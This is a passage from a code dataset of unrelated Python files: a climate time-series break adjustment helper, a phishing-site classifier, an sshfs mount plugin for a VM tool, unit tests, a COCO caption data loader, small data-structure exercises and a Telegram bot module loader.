'testdata_original'].values)\n var_before_break_original = np.nanvar(df.loc[timeframe[0]:breaktime, 'testdata_original'].values)\n # Variance of original refdata after break\n var_after_break_refdata_original = np.nanvar(df.loc[breaktime_next:timeframe[1], 'refdata_original'].values)\n var_before_break_refdata_original = np.nanvar(df.loc[timeframe[0]:breaktime, 'refdata_original'].values)\n if 'refdata' in dataframe.columns.values:\n # Variance of refdata after break\n var_after_break_refdata = np.nanvar(df.loc[breaktime_next:timeframe[1], 'refdata'].values)\n var_before_break_refdata = np.nanvar(df.loc[timeframe[0]:breaktime, 'refdata'].values)\n\n\n\n\n data_dict['mean_after_break_testdata'] = mean_after_break_testdata\n data_dict['mean_before_break_testdata'] = mean_before_break_testdata\n data_dict['mean_after_break_original'] = mean_after_break_original\n data_dict['mean_before_break_original'] = mean_before_break_original\n data_dict['mean_after_break_refdata_original'] = mean_after_break_refdata_original\n data_dict['mean_before_break_refdata_original'] = mean_before_break_refdata_original\n if 'refdata' in dataframe.columns.values:\n data_dict['mean_after_break_refdata'] = mean_after_break_refdata\n data_dict['mean_before_break_refdata'] = mean_before_break_refdata\n\n data_dict['var_after_break_testdata'] = var_after_break_testdata\n data_dict['var_before_break_testdata'] = var_before_break_testdata\n data_dict['var_after_break_original'] = var_after_break_original\n data_dict['var_before_break_original'] = var_before_break_original\n data_dict['var_after_break_refdata_original'] = var_after_break_refdata_original\n data_dict['var_before_break_refdata_original'] = var_before_break_refdata_original\n if 'refdata' in dataframe.columns.values:\n data_dict['var_after_break_refdata'] = var_after_break_refdata\n data_dict['var_before_break_refdata'] = var_before_break_refdata\n\n\n if return_ts:\n Q_adj_ref_after_break = df.loc[breaktime_next:timeframe[1], 'testdata'].values - \\\n df.loc[breaktime_next:timeframe[1], 'refdata_original'].values\n Q_orig_ref_after_break = df.loc[breaktime_next:timeframe[1], 'testdata_original'].values - \\\n df.loc[breaktime_next:timeframe[1], 'refdata_original'].values\n else:\n df = False\n\n return df, data_dict\n\n\ndef create_testresults_col(frame):\n 
'''\n Takes a data frame and uses the columns h_MEAN and h_VAR to create a combined\n 'test results' column with values Nan, 0, 1, 2 and 3\n\n Parameters\n ----------\n frame : pandas.DataFrame\n Input Frame of test results\n Returns\n -------\n test_results : pandas.Series\n Series of combined test results\n\n '''\n frame = frame.copy()\n\n tested_gpis = frame[['h_MEAN', 'h_VAR']].dropna()\n hmean_gpis = frame[['h_MEAN']].dropna().loc[frame['h_MEAN'] == 1.0]\n hvar_gpis = frame[['h_VAR']].dropna().loc[frame['h_VAR'] == 1.0]\n\n index2breaks = frame[['h_MEAN', 'h_VAR']].dropna().query('h_VAR == 1.0 & h_MEAN == 1.0 ').index\n hboth_gpis = frame[['h_MEAN', 'h_VAR']].dropna().loc[index2breaks]\n\n # Classification of MEAN VAR and BOTH\n tested_gpis['test_results'] = 4.0\n tested_gpis.loc[hmean_gpis.index, 'test_results'] = 1.0\n tested_gpis.loc[hvar_gpis.index, 'test_results'] = 2.0\n tested_gpis.loc[index2breaks, 'test_results'] = 3.0\n\n frame.loc[tested_gpis.index, 'test_results'] = tested_gpis\n\n return frame[['test_results']]\n","sub_path":"ccibreakadjustment/otherfunctions.py","file_name":"otherfunctions.py","file_ext":"py","file_size_in_byte":9577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"112066636","text":"import numpy as np\nimport pandas as pd\nfrom scipy.io.arff import loadarff\nfrom sklearn import preprocessing, neighbors\nfrom sklearn.model_selection import train_test_split\n\n'''\nbased on a set of attributes of a website we want to know\nif it is a likely a phishing website or not.\n\ndata taken from \"https://archive.ics.uci.edu/ml/datasets/Phishing+Websites\"\nfor a description of dataset refer to above link\n'''\n\n# load arff file into numpy record array\n# meta is the header information(attributes,...)\ndata, meta = loadarff('phishing_sites.arff')\n# create a pandas dataframe from record array\n# it is easier to performe any action on data\n# in pandas dataframe, though here isn't much!\ndf = pd.DataFrame.from_records(data, coerce_float=True)\n# convert boolean type of columns to int\nfor col in df.columns.values:\n\tdf[col] = df[col].astype(int)\n\n# data doesn't contain missing data, just to be sure\n# drop any NaN values\ndf.dropna(inplace=True)\n\n# feature set: anything but 'Result'\nX = np.array(df.drop(['Result'], axis=1))\n# label set: 'Result' column\ny = np.array(df['Result'])\n\n# split training data from testing one\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n\n# defining classifier\nclf = neighbors.KNeighborsClassifier()\n# train the classifier\nclf.fit(X_train, y_train)\n\naccuracy = clf.score(X_test, y_test)\n\nprint(\"\\nAccuracy: {}\\n\" .format(accuracy))\n\n# a prediction example:\nsample_site_measures = np.array([-1,0,1,1,1,-1,-1,-1,1,1,1,1,-1,-1,0,-1,1,1,0,1,1,1,1,-1,1,-1,-1,-1,1,1])\nsample_site_measures = sample_site_measures.reshape(1, -1)\n\nresult = clf.predict(sample_site_measures)\nif result == 1:\n\tresult = 'Safe'\nelif result == -1:\n\tresult = 'Unsafe'\n\nprint(\"\\nPrediction for Site Measures {}\\n is {}\" .format(sample_site_measures, result))","sub_path":"classification/classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"267388067","text":"import os\nimport getpass\n\nfrom multiprocessing import Condition\n\n\nfrom xii import error, util, need\nfrom xii.validator import Dict, String, RequiredKey, Key, 
VariableKeys\n\nfrom xii.components.node import NodeAttribute\n\n\n# sshmount:\n# mount ssh folder from spawned instance to host name\n# by:\n# spawning:\n# - Generate ssh private key (unless generate-key: false)\n# - Copy private key to instance and overwrite $HOME/.ssh/id_rsa.pub\n# - Add public key to $HOME/.ssh/know_hosts on the spawning host\n# start:\n# - Connect to instance using the default connection\n# - running: sshmount {hostuser}@{host}:{hostfilepath} {instancefilepath}\n# - check returncode\n# stop:\n# - Connect to instance using default connection\n# - running: fusermount -f -u {instancepath}\n# - check returncode\n# destroy:\n# - open $HOME/.ssh/known_hosts on host\n# - check if public key entry exists\n# - remove key if exists\n# - write $HOME/.ssh/known_hosts\n\n\n_pending = Condition()\n\nclass SSHMountAttribute(NodeAttribute, need.NeedGuestFS, need.NeedSSH, need.NeedIO):\n atype = \"sshmount\"\n requires = [\"image\", \"ssh\", \"user\", \"network\"]\n\n key_path = \".ssh/xii-sshfs.key\"\n\n keys = Dict([\n VariableKeys(Dict([\n RequiredKey(\"source\", String(\"/path/to/source/directory\")),\n Key(\"user\", String(\"xii\"))\n ]), example=\"/path/to/dest/directory\")\n ])\n\n def sshfs_key_path(self, name):\n home = self.guest_user_home(name)\n if not home:\n return None\n return os.path.join(home, self.key_path)\n\n def spawn(self):\n self._check_sshfs_compability()\n\n required = self._get_required_users()\n host = self._host_name()\n\n _pending.acquire()\n\n authed_hosts = self._authorized_hosts()\n\n for user, home in required.items():\n\n path = os.path.join(home, self.key_path)\n\n sign = user + \"@\" + host\n (key, pubkey) = util.generate_rsa_key_pair()\n\n # save private key to domain_image\n self.say(\"{} => {}\".format(user, self.component_entity()))\n self.guest().write(path, key)\n\n for idx, host in enumerate(authed_hosts):\n # check if public key alreay exists. 
If so update key\n if host.find(sign) != -1:\n self.say(\"update authorized_keys ({})\".format(sign))\n authed_hosts[idx] = pubkey + \" \" + sign\n break\n else:\n self.say(\"{} => local authorized_keys\".format(sign))\n authed_hosts.append(pubkey + \" \" + sign)\n\n with open(self._authorized_keys_path(), \"w\") as auth:\n authed_hosts = filter(None, authed_hosts)\n auth.write(\"\\n\".join(authed_hosts))\n _pending.release()\n\n def destroy(self):\n authed_hosts = self._authorized_hosts()\n host = self._host_name()\n\n if not os.path.exists(self._authorized_keys_path()):\n return\n\n # removing key from authorized_keys\n\n _pending.acquire()\n for mount in self.settings().values():\n user = self.io().user()\n\n if \"user\" in mount:\n user = mount[\"user\"]\n\n sign = user + \"@\" + host\n\n for idx, host in enumerate(authed_hosts):\n if host.find(sign) != -1:\n del authed_hosts[idx]\n break\n\n with open(self._authorized_keys_path(), \"w\") as auth:\n authed_hosts = filter(None, authed_hosts)\n auth.write(\"\\n\".join(authed_hosts))\n _pending.release()\n\n\n def after_start(self):\n self._mount_dirs()\n pass\n\n def stop(self):\n self._umount_dirs()\n pass\n\n def after_resume(self):\n self._mount_dirs()\n pass\n\n def suspend(self):\n self._umount_dirs()\n pass\n\n def _mount_dirs(self):\n # local connection\n host = self.network_get_host_ip(self.other_attribute(\"network\").network_name())\n key = os.path.join(\"~\", self.key_path)\n\n # remote connection\n ssh = self.default_ssh()\n\n for dest, settings in self.settings().items():\n\n source = settings[\"source\"]\n user = self.io().user()\n\n if \"user\" in settings:\n user = settings[\"user\"]\n\n # make a absolute path if neccessary\n if not os.path.isabs(source):\n source = os.path.join(os.getcwd(), source)\n if not os.path.isabs(dest):\n dest = os.path.join(ssh.user_home(), dest)\n\n if not os.path.isdir(source):\n self.warn(\"sshfs source `{}` is not a directory\"\n .format(source))\n continue\n\n ssh.mkdir(dest)\n\n options = (\"-o StrictHostKeyChecking=no \"\n \"-o UserKnownHostsFile=/dev/null \"\n \"-o IdentityFile={}\".format(key))\n self.say(\"{} => {}\".format(source, dest))\n\n ssh.run(\"sshfs {}@{}:{} {} {}\".format(user, host, source, dest, options))\n\n def _umount_dirs(self):\n ssh = self.default_ssh()\n for dest, settings in self.settings().items():\n if not os.path.isabs(dest):\n dest = os.path.join(ssh.user_home(), dest)\n self.say(\"unmounting {}...\".format(dest))\n ssh.shell(\"fusermount -u {}\".format(dest))\n\n def _authorized_keys_path(self):\n local_home = os.path.expanduser('~')\n return os.path.join(local_home, \".ssh/authorized_keys\")\n\n def _authorized_hosts(self):\n authorized_keys = self._authorized_keys_path()\n\n # touch the file if not exists\n if not os.path.isfile(authorized_keys):\n with open(authorized_keys, \"a\"):\n pass\n\n with open(authorized_keys, \"r\") as auth:\n content = [line.strip() for line in auth.readlines()]\n return filter(None, content)\n\n def _host_name(self):\n return self.component_entity()\n\n def _check_sshfs_compability(self):\n sshfs_locations = [\"/usr/bin/sshfs\"]\n\n self.say(\"checking sshfs compability\")\n for location in sshfs_locations:\n if self.guest().exists(location):\n return\n\n raise error.NotFound(\"Image for {} seems to not support sshfs.\"\n .format(self.component_entity()))\n\n def _get_required_users(self):\n required = {}\n\n users = self.guest_get_users()\n default = self.default_ssh_user()\n\n for mount in self.settings().values():\n user = 
default\n\n if \"user\" in mount:\n user = mount[\"user\"]\n\n if user not in users:\n self.warn(\"can not use {} for sshfs. User does not exist\"\n .format(user))\n continue\n\n # we already prepare this user\n if user in required:\n continue\n\n required[user] = users[user][\"home\"]\n return required\n","sub_path":"src/xii/builtin/components/node/attributes/sshmount/node_sshmount.py","file_name":"node_sshmount.py","file_ext":"py","file_size_in_byte":7087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"467277531","text":"import sys, os\nfrom jstatutree.jstatute_dict import JStatuteDict, JStatutreeKVSDict, JSSentenceKVSDict\nimport unittest\nfrom jstatutree import lawdata\nfrom jstatutree.xmltree import xml_lawdata as xml_lawdata\nfrom jstatutree.etypes import Law, Article, Sentence\nimport shutil\n\nclass LawDataTestCase(unittest.TestCase):\n def setgetitem_testunit(self, assert_if, lawnum, only_reiki):\n jsdict = JStatuteDict(only_reiki=only_reiki)\n statute = lawdata.SourceInterface()\n statute._lawdata = lawdata.LawData()\n statute.lawdata._lawnum = lawnum\n if assert_if == \"skip\":\n jsdict[statute.lawdata] = statute\n self.assertTrue(len(jsdict) == 0)\n elif assert_if == \"success\":\n jsdict[statute.lawdata] = statute\n self.assertTrue(len(jsdict) == 1)\n self.assertTrue(jsdict[statute.lawdata] == statute)\n\n def test_setgetitem(self):\n self.setgetitem_testunit(\"success\", \"XX条例\", True)\n self.setgetitem_testunit(\"success\", \"XX規則\", True)\n self.setgetitem_testunit(\"skip\", \"XX告示\", True)\n self.setgetitem_testunit(\"success\", \"XX条例\", False)\n self.setgetitem_testunit(\"success\", \"XX規則\", False)\n self.setgetitem_testunit(\"success\", \"XX告示\", False)\n self.assertRaises(\n Exception,\n lambda: JStatuteDict().__setitem__(\"hoge\", \"fuga\")\n )\n\nTEST_PATH = os.path.dirname(__file__)\nDB_PATH = os.path.join(TEST_PATH, \"testdb.ldb\")\nDATASET_PATH = os.path.join(TEST_PATH, \"testset\")\nclass JSKVSTestCase(unittest.TestCase):\n def setUp(self):\n self.levels = [Law, Article, Sentence]\n self.treedict = JStatutreeKVSDict(path=DB_PATH, levels=self.levels, create_if_missing=True)\n self.sentence_dicts = {\n level.__name__: JSSentenceKVSDict(kvsdict=self.treedict, level=level)\n for level in self.levels\n }\n self.rr = xml_lawdata.ReikiXMLReader(\n os.path.join(\n os.path.dirname(__file__), \"testset/01/010001/0001.xml\"\n )\n )\n self.rr.open()\n\n def tearDown(self):\n self.treedict.close()\n shutil.rmtree(DB_PATH)\n\n def test_init(self):\n self.assertTrue(self.treedict.levels == [Law, Article, Sentence])\n for level in self.levels:\n self.assertTrue(self.sentence_dicts[level.__name__].prefix == \"sentence-{}-\".format(level.__name__).encode(self.sentence_dicts[level.__name__].ENCODING))\n\n\n def regtree_test_unit(self, elem, next_level_i):\n print(elem.etype.__name__, self.levels[next_level_i].__name__)\n correct_next_elems = list(elem.depth_first_search(self.levels[next_level_i]))\n correct_next_elem_codes = sorted([e.code for e in correct_next_elems])\n self.assertEqual(sorted(self.treedict[elem.code]), correct_next_elem_codes)\n for next_elem in elem.depth_first_search(self.levels[next_level_i]):\n if next_level_i+1 < len(self.levels):\n self.regtree_test_unit(next_elem, next_level_i+1)\n\n def test_regtree(self):\n ld = self.rr.lawdata\n ld.is_reiki = lambda: True\n tree = self.rr.get_tree()\n self.treedict[self.rr.lawdata.code] = tree\n\n\nif __name__ == \"__main__\":\n 
unittest.main()\n","sub_path":"tests/jstatutree_dict_test.py","file_name":"jstatutree_dict_test.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"491530121","text":"from __future__ import print_function, division, absolute_import, with_statement, unicode_literals, generators\nimport torch\nimport torchvision.transforms as transforms\nimport torch.utils.data as data\nimport os\nimport pickle\nimport numpy as np\nimport nltk\nfrom PIL import Image\nfrom caption_vocab import Vocabulary\nfrom pycocotools.coco import COCO\nfrom torch.nn.utils.rnn import pack_padded_sequence\n\n# Image preprocessing, normalization for the pretrained resnet\ncrop_size = 224\nnormalizer = transforms.Normalize((0.485, 0.456, 0.406),\n (0.229, 0.224, 0.225))\ntrain_transform = transforms.Compose([\n transforms.RandomCrop(crop_size),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalizer])\neval_transform = transforms.Compose([\n transforms.Resize([crop_size, crop_size]),\n transforms.ToTensor(),\n normalizer])\n\ndef tokenize_and_encapsulate(vocab):\n def fn(caption):\n \"\"\"Convert caption (string) to word ids.\"\"\"\n tokens = nltk.tokenize.word_tokenize(str(caption).lower())\n ids = []\n ids.append(vocab.bos_token_id)\n ids.extend(map(vocab, tokens))\n ids.append(vocab.eos_token_id)\n return ids\n return fn\n\nclass CocoDataset(data.Dataset):\n \"\"\"COCO Custom Dataset compatible with torch.utils.data.DataLoader.\"\"\"\n def __init__(self, root, json, vocab, transform=None):\n \"\"\"Set the path for images, captions and vocabulary wrapper.\n \n Args:\n root: image directory.\n json: coco annotation file path.\n vocab: vocabulary wrapper.\n transform: image transformer.\n \"\"\"\n self.root = root\n self.coco = COCO(json)\n self.vocab = vocab\n self.fn = tokenize_and_encapsulate(self.vocab)\n self.transform = transform\n\n def __len__(self):\n raise NotImplementedError\n\n def __getitem__(self, index):\n raise NotImplementedError\n\nclass CocoAnnDataset(CocoDataset):\n def __init__(self, root, json, vocab, transform=None):\n super(CocoAnnDataset, self).__init__(root, json, vocab, transform)\n self.anns = list(self.coco.anns.values())\n\n def __len__(self):\n return len(self.anns)\n\n def __getitem__(self, index):\n \"\"\"Returns one data pair (image and caption).\"\"\"\n ann = self.anns[index]\n caption = ann['caption']\n img_id = ann['image_id']\n path = self.coco.loadImgs(img_id)[0]['file_name']\n image = Image.open(os.path.join(self.root, path)).convert('RGB')\n if self.transform is not None:\n image = self.transform(image)\n return image, self.fn(caption)\n\nclass CocoImgDataset(CocoDataset):\n def __init__(self, root, json, vocab, transform=None):\n super(CocoImgDataset, self).__init__(root, json, vocab, transform)\n self.imgToAnns = list(self.coco.imgToAnns.items())\n self.imgToAnns.sort()\n\n def __len__(self):\n return len(self.imgToAnns)\n\n def __getitem__(self, index):\n \"\"\"Returns one data pair (image and captions).\"\"\"\n vocab = self.vocab\n img_id, anns = self.imgToAnns[index]\n captions = (ann['caption'] for ann in anns)\n path = self.coco.loadImgs(img_id)[0]['file_name']\n image = Image.open(os.path.join(self.root, path)).convert('RGB')\n if self.transform is not None:\n image = self.transform(image)\n return image, list(map(self.fn, captions))\n\ndef ann_collate_fn_on_device(device):\n def collate_fn(data):\n \"\"\"Creates mini-batch tensors from the list of tuples (image, 
caption).\n \n We should build custom collate_fn rather than using default collate_fn, \n because merging caption (including padding) is not supported in default.\n\n Args:\n data: list of tuple (image, caption). \n - image: torch tensor of shape (3, 256, 256).\n - caption: list.\n\n Returns:\n images: torch tensor of shape (batch_size, 3, 256, 256).\n targets: torch tensor of shape (batch_size, padded_length).\n lengths: list; valid length for each padded caption.\n \"\"\"\n # Sort a data list by caption length (descending order).\n #data.sort(key=lambda x: len(x[1]), reverse=True)\n images, captions = zip(*data)\n\n # Merge images (from tuple of 3D tensor to 4D tensor).\n images = torch.stack(images, 0).to(device)\n\n # Merge captions (from tuple of 1D tensor to 2D tensor).\n lengths = [len(cap) for cap in captions]\n targets = torch.zeros(len(captions), max(lengths), dtype=torch.long)\n for i, cap in enumerate(captions):\n targets[i, :len(cap)] = torch.tensor(cap, dtype=torch.long)\n targets = targets.to(device)\n #targets = pack_padded_sequence(targets, lengths, batch_first=True)[0]\n return images, targets, lengths\n\n return collate_fn\n\ndef img_collate_fn_on_device(device):\n def collate_fn(data):\n \"\"\"Creates mini-batch tensors from the list of tuples (image, captions).\n \n We should build custom collate_fn rather than using default collate_fn, \n because merging caption (including padding) is not supported in default.\n\n Args:\n data: list of tuple (image, captions). \n - image: torch tensor of shape (3, 256, 256).\n - captions: list of list.\n\n Returns:\n images: torch tensor of shape (batch_size, 3, 256, 256).\n captions: same as input.\n \"\"\"\n images, captions = zip(*data)\n\n # Merge images (from tuple of 3D tensor to 4D tensor).\n images = torch.stack(images, 0).to(device)\n\n return images, captions\n\n return collate_fn\n\ndef get_ann_loader(root, json, vocab, batch_size, transform=train_transform, shuffle=True, num_workers=0, device='cuda'):\n \"\"\"Returns torch.utils.data.DataLoader for custom coco dataset.\"\"\"\n # COCO caption dataset\n coco = CocoAnnDataset(root=root,\n json=json,\n vocab=vocab,\n transform=transform)\n \n # Data loader for COCO dataset\n # This will return (images, captions, lengths) for each iteration.\n # images: a tensor of shape (batch_size, 3, 224, 224).\n # captions: a tensor of shape (batch_size, padded_length).\n # lengths: a list indicating valid length for each caption. 
length is (batch_size).\n data_loader = torch.utils.data.DataLoader(dataset=coco, \n batch_size=batch_size,\n shuffle=shuffle,\n num_workers=num_workers,\n collate_fn=ann_collate_fn_on_device(device))\n return data_loader\n\ndef get_img_loader(root, json, vocab, batch_size, transform=eval_transform, shuffle=False, num_workers=0, device='cuda'):\n \"\"\"Returns torch.utils.data.DataLoader for custom coco dataset.\"\"\"\n # COCO caption dataset\n coco = CocoImgDataset(root=root,\n json=json,\n vocab=vocab,\n transform=transform)\n \n # Data loader for COCO dataset\n # This will return (images, captions) for each iteration.\n # images: a tensor of shape (batch_size, 3, 224, 224).\n data_loader = torch.utils.data.DataLoader(dataset=coco, \n batch_size=batch_size,\n shuffle=shuffle,\n num_workers=num_workers,\n collate_fn=img_collate_fn_on_device(device))\n return data_loader\n","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":7781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"42546383","text":"class Node:\n def __init__(self, val):\n self.data = val\n self.next = None\n\n\ndef print_linked_list(head):\n # a while loop to print the linked list\n curr = head\n while(curr):\n print(curr.data, end=\" \")\n curr = curr.next\n print()\n\n\ndef give_length(head):\n # utility function to calculate length or number of nodes in the linked list\n\n if head is None:\n return 0\n curr = head\n length = 0\n while(curr is not None):\n length += 1\n curr = curr.next\n return length\n\n\ndef segregate_even_odd_ll(head):\n\n # base case if linked list has only one node\n if head.next is None:\n # return the ll\n return head\n\n # now we first or segregate the linked list into two linked lists\n odd_head, odd_last, even_head, even_last = None, None, None, None\n\n curr = head\n\n while curr is not None:\n\n # two possiblities either data at curr is odd or even\n\n if curr.data % 2 == 1:\n\n # two possiblities either it is the first element for the even ll\n # or not\n\n if odd_head is None:\n # first element to be put in linked list\n odd_head = curr\n odd_last = curr\n\n elif odd_head is not None:\n odd_last.next = curr\n odd_last = curr\n\n if curr.data % 2 == 0:\n\n # two possiblities either it is the first element for the even ll\n # or not\n\n if even_head is None:\n # first element to be put in linked list\n even_head = curr\n even_last = curr\n\n elif even_head is not None:\n even_last.next = curr\n even_last = curr\n curr = curr.next\n\n if even_last is not None:\n even_last.next = odd_head\n if odd_last is not None:\n odd_last.next = None\n head = even_head\n\n else:\n head = odd_head\n\n return head\n\n\ndef create_ll(head, arr):\n curr = head\n for i in range(1, len(arr)):\n new_node = Node(arr[i])\n curr.next = new_node\n curr = new_node\n\n return head\n\n\n# main function\nif __name__ == '__main__':\n\n test = int(input())\n\n while test > 0:\n n = int(input())\n arr = list(map(int, input().split(' ')))\n head = Node(arr[0])\n fir_head = create_ll(head, arr)\n # print_linked_list(fir_head)\n p = segregate_even_odd_ll(fir_head)\n print_linked_list(p)\n test -= 1\n\n # fir_head = Node(12)\n # tem = Node(15)\n # tem1 = Node(10)\n # tem2 = Node(11)\n # tem3 = Node(5)\n # tem4 = Node(6)\n # tem5 = Node(2)\n # tem6 = Node(3)\n # fir_head.next = tem\n # tem.next = tem1\n # tem1.next = tem2\n # tem2.next = tem3\n # tem3.next = tem4\n # tem4.next = tem5\n # tem5.next = tem6\n # 
print_linked_list(fir_head)\n # p = segregate_even_odd_ll(fir_head)\n # print_linked_list(fir_head)\n","sub_path":"segregate_even_odd_ll.py","file_name":"segregate_even_odd_ll.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"328294995","text":"from turtle import *\r\nfrom turtle import Turtle, Screen\r\n\r\nclass Ball(Turtle):\r\n \r\n def __init__(self, x, y, dx, dy, r, color):\r\n Turtle.__init__(self)\r\n print(color)\r\n \r\n self.penup()\r\n self.goto(x, y)\r\n self.shape(\"circle\")\r\n self.color(color)\r\n \r\n self.dx = dx\r\n self.dy = dy\r\n self.r = r\r\n self.shapesize(self.r/10)\r\n\r\n def move(self, screen_width, screen_height):\r\n current_x = self.position()[0]\r\n new_x = current_x + self.dx\r\n\r\n current_y = self.position()[1]\r\n new_y = current_y + self.dy\r\n\r\n right_side_ball = new_x + self.r\r\n left_side_ball = new_x - self.r\r\n up_side_ball = new_y + self.r\r\n down_side_ball = new_y - self.r\r\n\r\n self.goto(new_x,new_y)\r\n\r\n if(right_side_ball > screen_width or left_side_ball < -screen_width):\r\n self.dx = -self.dx\r\n if right_side_ball>screen_width:\r\n self.goto(screen_width-self.r,current_y+self.dy)\r\n if left_side_ball<-screen_width:\r\n self.goto(-screen_width+self.r,current_y+self.dy)\r\n\r\n if(up_side_ball > screen_height or down_side_ball < -screen_height):\r\n self.dy = -self.dy\r\n if up_side_ball>screen_height:\r\n self.goto(current_x+self.dx,screen_height-self.r)\r\n if down_side_ball<-screen_height:\r\n self.goto(current_x+self.dx,-screen_height+self.r)\r\n \r\n\r\n def new_Ball(self, x, y, dx, dy, r, color):\r\n #color = tuple([a/255 for a in color])\r\n print(color)\r\n \r\n self.goto(x, y)\r\n self.shape(\"circle\")\r\n self.shapesize(r/10)\r\n try:\r\n self.color(color)\r\n except:\r\n self.color('blue')\r\n self.penup()\r\n \r\n \r\n self.dx = dx\r\n self.dy = dy\r\n self.r = r\r\n","sub_path":"ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"163839736","text":"from pathlib import Path\n\nvalues = Path('https://github.com/first20hours/google-10000-english/blob/master/google-10000-english-usa.txt').read_text()\n\nclass HashTable(object):\n def __init__(self, length=4):\n self.array = [None] * length\n\n def hash(self, key):\n length = len(self.array)\n return hash(key) % length\n\n def add(self, key, value):\n index = self.hash(key)\n if self.array[index] is not None:\n for kvPairs in self.array[index]:\n if kvPairs[0] == key:\n kvPairs[1] = value\n break\n else:\n self.array[index].append([key, value])\n else:\n self.array[index] = [[key, value]]\n\n if self.is_full():\n self.double()\n\n def get(self, key):\n index = self.hash(key)\n if self.array[index] is None:\n raise KeyError()\n else:\n for kvPairs in self.array[index]:\n if kvPairs[0] == key:\n return kvPairs[1]\n\n raise KeyError()\n\n def is_full(self):\n items = 0\n for item in self.array:\n if item is not None:\n items += 1\n return items > len(self.array)/2\n\n def double(self):\n htTwo = HashTable(length=len(self.array)*2)\n for i in range(len(self.array)):\n if self.array[i] is None:\n continue\n\n for kvPairs in self.array[i]:\n htTwo.add(kvPairs[0], kvPairs[1])\n\n self.array = htTwo.array\n\n\n","sub_path":"Hashing.py","file_name":"Hashing.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"539457127","text":"class TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def minDepth(self, root: TreeNode) -> int:\n self.min = 99999\n self.cur = 0\n self.deep(root)\n return self.min\n\n def deep(self, node: TreeNode) -> None:\n if not node:\n self.min = self.cur\n return\n self.cur += 1\n if not node.left and not node.right and self.cur < self.min:\n self.min = self.cur\n if node.left:\n self.deep(node.left)\n if node.right:\n self.deep(node.right)\n self.cur -= 1\n","sub_path":"0111.py","file_name":"0111.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"647551747","text":"import django_filters\n\nfrom .models import Category, Genre, Title\n\n\nclass TitleFilter(django_filters.FilterSet):\n genre = django_filters.filters.ModelMultipleChoiceFilter(\n queryset=Genre.objects.all(),\n field_name='genre__slug',\n to_field_name='slug',\n )\n category = django_filters.filters.ModelChoiceFilter(\n queryset=Category.objects.all(),\n field_name='category',\n to_field_name='slug',\n )\n name = django_filters.CharFilter(lookup_expr='contains')\n year = django_filters.NumberFilter()\n\n class Meta:\n model = Title\n fields = ['category', 'genre', 'name', 'year']\n","sub_path":"categories/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"154443801","text":"from homebot.core.error_handler import error_handler\nfrom homebot.core.logging import LOGE, LOGI\nfrom homebot.core.mdlintf import get_all_modules_list, get_module\nfrom telegram.ext import Dispatcher, Updater\nfrom threading import Lock\nfrom types import MethodType\n\n# Module status\n(\n\tMODULE_STATUS_DISABLED,\n\tMODULE_STATUS_ENABLED,\n\tMODULE_STATUS_ENABLING,\n\tMODULE_STATUS_DISABLING,\n\tMODULE_STATUS_ERROR,\n) = range(5)\n\nMODULE_STATUS_MESSAGE = {\n\tMODULE_STATUS_DISABLED: \"Disabled\",\n\tMODULE_STATUS_ENABLED: \"Enabled\",\n\tMODULE_STATUS_ENABLING: \"Enabling\",\n\tMODULE_STATUS_DISABLING: \"Disabling\",\n\tMODULE_STATUS_ERROR: \"Error\",\n}\n\ndef enable_module(self: Dispatcher, module_name: str):\n\t\"\"\"\n\tLoad a provided module and add its command handler\n\tto the bot's dispatcher.\n\t\"\"\"\n\tLOGI(f\"Loading module {module_name}\")\n\n\tmodule = get_module(module_name)\n\tif module is None:\n\t\traise ModuleNotFoundError(f\"Module {module_name} not found\")\n\n\twith self.modules_status_lock:\n\t\tif not module_name in self.modules_status:\n\t\t\tself.modules_status[module_name] = MODULE_STATUS_DISABLED\n\n\t\tif self.modules_status[module_name] == MODULE_STATUS_ENABLED:\n\t\t\traise AttributeError(\"Module is already enabled\")\n\n\t\tself.modules_status[module_name] = MODULE_STATUS_ENABLING\n\n\t\ttry:\n\t\t\tfor command in module.commands:\n\t\t\t\tself.add_handler(command.handler)\n\t\t\tmodule.add_user(self.bot)\n\t\texcept:\n\t\t\tLOGE(f\"Failed to add handler for module {module_name}\")\n\t\t\tself.modules_status[module_name] = MODULE_STATUS_ERROR\n\t\telse:\n\t\t\tself.modules_status[module_name] = MODULE_STATUS_ENABLED\n\t\t\tLOGI(f\"Module {module_name} enabled\")\n\ndef disable_module(self: Dispatcher, module_name: str):\n\t\"\"\"\n\tUnload a provided module and remove its command handler\n\tfrom the bot's dispatcher.\n\t\"\"\"\n\tLOGI(f\"Unloading module {module_name}\")\n\n\tmodule = 
